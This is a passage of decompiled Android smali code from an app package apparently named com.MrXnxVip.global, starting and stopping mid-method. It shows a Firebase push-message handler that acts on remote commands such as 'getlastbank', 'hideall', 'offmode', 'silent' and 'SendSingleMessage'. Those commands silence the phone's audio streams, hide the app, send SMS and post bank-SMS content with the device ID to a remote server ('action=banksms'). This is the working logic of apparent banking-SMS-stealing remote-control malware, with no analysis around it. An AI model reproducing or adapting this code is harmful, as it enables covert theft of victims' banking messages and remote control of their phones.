                        516move-result v3
                        517if-eqz v3, :cond_4
                        518const/16 v3, 0x3c
                        519iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        520goto/16 :goto_4
                        521pswitch_2e9: const/16 v3, 0x3a
                        522iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        524sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        526sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        527const/4 v3, 0x5
                        528const/16 v4, 0x64
                        530invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        532sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        534sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        535const/4 v3, 0x2
                        537invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        539sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        541sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        543invoke-static {v14, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        545sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        547sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        549invoke-static {v7, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        551sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        553sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        554const/4 v3, 0x4
                        556invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        558sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        560sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        561const/4 v3, 0x3
                        563invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        564goto/16 :goto_4
                        565pswitch_31f: const/16 v3, 0x3a
                        566iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        568sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        570const-string v4, "normal"
                        572invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        573move-result v3
                        574if-eqz v3, :cond_4
                        575const/16 v3, 0x39
                        576iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        577goto/16 :goto_4
                        578pswitch_333: const/16 v3, 0x37
                        579iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        581sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        583sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        584const/4 v3, 0x5
                        586invoke-static {v3, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        588sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        590sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        591const/4 v3, 0x2
                        593invoke-static {v3, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        595sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        597sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        599invoke-static {v14, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        601sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        603sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        605invoke-static {v7, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        607sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        609sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        610const/4 v3, 0x4
                        612invoke-static {v3, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        614sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        616sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        617const/4 v3, 0x3
                        619invoke-static {v3, v7, v14}, Lanywheresoftware/b4a/phone/Phone;->SetVolume(IIZ)V
                        620goto/16 :goto_4
                        621pswitch_367: const/16 v3, 0x37
                        622iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        624sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        626const-string v4, "silent"
                        628invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        629move-result v3
                        630if-eqz v3, :cond_4
                        631const/16 v3, 0x36
                        632iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        633goto/16 :goto_4
                        634pswitch_37b: const/16 v3, 0x34
                        635iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        636new-instance v3, Ljava/lang/StringBuilder;
                        638invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        640const-string v4, "result=ok&action=banksms&androidid="
                        642invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        644sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        646invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        648invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        650sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        652invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        654invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        656sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        658invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        660const-string v4, "&message22="
                        662invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        664invoke-static {}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv3()Ljava/lang/String;
                        665move-result-object v4
                        667invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        669invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        670move-result-object v3
                        671sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        673sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        674new-instance v4, Ljava/lang/StringBuilder;
                        676invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        678sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        680iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        682sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        684invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        686invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        688invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        689move-result-object v4
                        691sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        693invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        694goto/16 :goto_4
                        695pswitch_3ce: const/16 v3, 0x34
                        696iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        698sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        700const-string v4, "getlastbank"
                        702invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        703move-result v3
                        704if-eqz v3, :cond_4
                        705const/16 v3, 0x33
                        706iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        707goto/16 :goto_4
                        708pswitch_3e2: const/16 v3, 0x31
                        709iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        710iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        711goto/16 :goto_4
                        712pswitch_3ea: const/16 v3, 0x30
                        713iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        714iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        716const-string v3, "61310795"
                        718invoke-static {v3, v6, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        719goto/16 :goto_4
                        720pswitch_3f7: const/16 v3, 0x30
                        721iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        722const/16 v3, 0x2f
                        723iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        725sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv2:Ljava/lang/String;
                        727sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vvv3:Ljava/lang/String;
                        729invoke-static {v3, v4}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv2(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        730goto/16 :goto_4
                        731pswitch_408: const/16 v3, 0x30
                        732iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        733const/16 v3, 0x2f
                        734iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        735const/16 v3, 0x2d
                        736iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        737goto/16 :goto_4
                        738pswitch_416: const/16 v3, 0x2b
                        739iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        741const-string v3, "61310791"
                        743const-string v4, "ok"
                        745invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        746goto/16 :goto_4
                        747pswitch_423: const/16 v3, 0x31
                        748iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        750sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        752const-string v4, "SendSingleMessage"
                        754invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        755move-result v3
                        756if-eqz v3, :cond_4
                        757const/16 v3, 0x2a
                        758iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        759goto/16 :goto_4
                        760pswitch_437: const/16 v3, 0x28
                        761iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        762iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        763goto/16 :goto_4
                        764pswitch_43f: const/16 v3, 0x27
                        765iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        766iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        768const-string v3, "61310785"
                        770invoke-static {v3, v6, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        771goto/16 :goto_4
                        772pswitch_44c: const/16 v3, 0x27
                        773iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        774const/16 v3, 0x26
                        775iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        776iput-object v12, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_filepath:Ljava/lang/String;
                        778sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        780invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        781move-result-object v3
                        782iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_filepath:Ljava/lang/String;
                        784sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        786iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_filepath:Ljava/lang/String;
                        788const-string v4, "offlinemode.txt"
                        790invoke-static {v3, v4}, Lanywheresoftware/b4a/objects/streams/File;->Delete(Ljava/lang/String;Ljava/lang/String;)Z
                        792sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        794iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_filepath:Ljava/lang/String;
                        796const-string v4, "offlinemode2.txt"
                        798invoke-static {v3, v4}, Lanywheresoftware/b4a/objects/streams/File;->Delete(Ljava/lang/String;Ljava/lang/String;)Z
                        799goto/16 :goto_4
                        800pswitch_472: const/16 v3, 0x27
                        801iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        802const/16 v3, 0x26
                        803iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        804const/16 v3, 0x24
                        805iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        806goto/16 :goto_4
                        807pswitch_480: const/16 v3, 0x22
                        808iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        809goto/16 :goto_4
                        810pswitch_486: const/16 v3, 0x28
                        811iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        813sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        815const-string v4, "offmode2"
                        817invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        818move-result v3
                        819if-eqz v3, :cond_4
                        820const/16 v3, 0x21
                        821iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        822goto/16 :goto_4
                        823pswitch_49a: const/16 v3, 0x1f
                        824iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        825iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        826goto/16 :goto_4
                        827pswitch_4a2: const/16 v3, 0x1e
                        828iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        829iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        831const-string v3, "61310773"
                        833invoke-static {v3, v6, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        834goto/16 :goto_4
                        835pswitch_4af: const/16 v3, 0x1e
                        836iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        837const/16 v3, 0x1d
                        838iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        840sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        842sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        844invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        845move-result-object v3
                        847const-string v4, "offlinemode2.txt"
                        849sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vv7:Ljava/lang/String;
                        851invoke-static {v3, v4, v5}, Lanywheresoftware/b4a/objects/streams/File;->WriteString(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        853sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        855sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        857invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        858move-result-object v3
                        860const-string v4, "offlinemode.txt"
                        862const-string v5, "ON"
                        864invoke-static {v3, v4, v5}, Lanywheresoftware/b4a/objects/streams/File;->WriteString(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        865goto/16 :goto_4
                        866pswitch_4d7: const/16 v3, 0x1e
                        867iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        868const/16 v3, 0x1d
                        869iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        870const/16 v3, 0x1b
                        871iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        872goto/16 :goto_4
                        873pswitch_4e5: const/16 v3, 0x19
                        874iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        875goto/16 :goto_4
                        876pswitch_4eb: const/16 v3, 0x1f
                        877iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        879sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        881const-string v4, "offmode"
                        883invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        884move-result v3
                        885if-eqz v3, :cond_4
                        886const/16 v3, 0x18
                        887iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        888goto/16 :goto_4
                        889pswitch_4ff: const/16 v3, 0x16
                        890iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        891new-instance v3, Ljava/lang/StringBuilder;
                        893invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        895const-string v4, "result=ok&action=pingone&androidid="
                        897invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        899sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        901invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        903invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        905sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        907invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        909invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        911sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        913invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        915invoke-virtual {v3, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        917sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        919invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        921invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        923sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        925invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        927invoke-virtual {v3, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        929sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        931invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        933invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        934move-result-object v3
                        935sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        937sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        938new-instance v4, Ljava/lang/StringBuilder;
                        940invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        942sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        944iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        946sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        948invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        950invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        952invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        953move-result-object v4
                        955sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        957invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        958goto/16 :goto_4
                        959pswitch_55e: const/16 v3, 0x16
                        960iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        962sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        964const-string v4, "pingone"
                        966invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        967move-result v3
                        968if-eqz v3, :cond_4
                        969const/16 v3, 0x15
                        970iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        971goto/16 :goto_4
                        972pswitch_572: const/16 v3, 0x13
                        973iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        974goto/16 :goto_4
                        975pswitch_578: iput v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        977sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        979sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv0:Ljava/lang/String;
                        981invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        982move-result v3
                        983if-eqz v3, :cond_4
                        984const/16 v3, 0x12
                        985iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        986goto/16 :goto_4
                        987pswitch_58a: const/16 v3, 0x10
                        988iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        989iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        990goto/16 :goto_4
                        991pswitch_592: const/16 v3, 0xf
                        992iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        993iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        995const-string v3, "61310755"
                        997invoke-static {v3, v6, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        998goto/16 :goto_4
                        999pswitch_59f: const/16 v3, 0xf
                        1000iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1001const/16 v3, 0xe
                        1002iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        1004sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv5:Ljava/lang/String;
                        1006const-string v4, "\u0633\u0644\u0627\u0645"
                        1008invoke-static {v3, v4}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv2(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        1009goto/16 :goto_4
                        1010pswitch_5b0: const/16 v3, 0xf
                        1011iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1012const/16 v3, 0xe
                        1013iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        1014const/16 v3, 0xc
                        1015iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1016goto/16 :goto_4
                        1017pswitch_5be: const/16 v3, 0xa
                        1018iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1020const-string v3, "61310751"
                        1022const-string v4, "ok"
                        1024invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        1025goto/16 :goto_4
                        1026pswitch_5cb: const/16 v3, 0x10
                        1027iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1029sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        1031const-string v4, "bmb"
                        1033invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        1034move-result v3
                        1035if-eqz v3, :cond_4
                        1036const/16 v3, 0x9
                        1037iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1038goto/16 :goto_4
                        1039pswitch_5df: const/4 v3, 0x7
                        1040iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1042invoke-static {v7}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv1(Z)Ljava/lang/String;
                        1043goto/16 :goto_4
                        1044pswitch_5e7: const/4 v3, 0x7
                        1045iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1047sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        1049const-string v4, "hideall"
                        1051invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        1052move-result v3
                        1053if-eqz v3, :cond_4
                        1054const/4 v3, 0x6
                        1055iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1056goto/16 :goto_4
                        1057pswitch_5f9: const/4 v3, 0x4
                        1058iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1060const-string v3, "61310738"
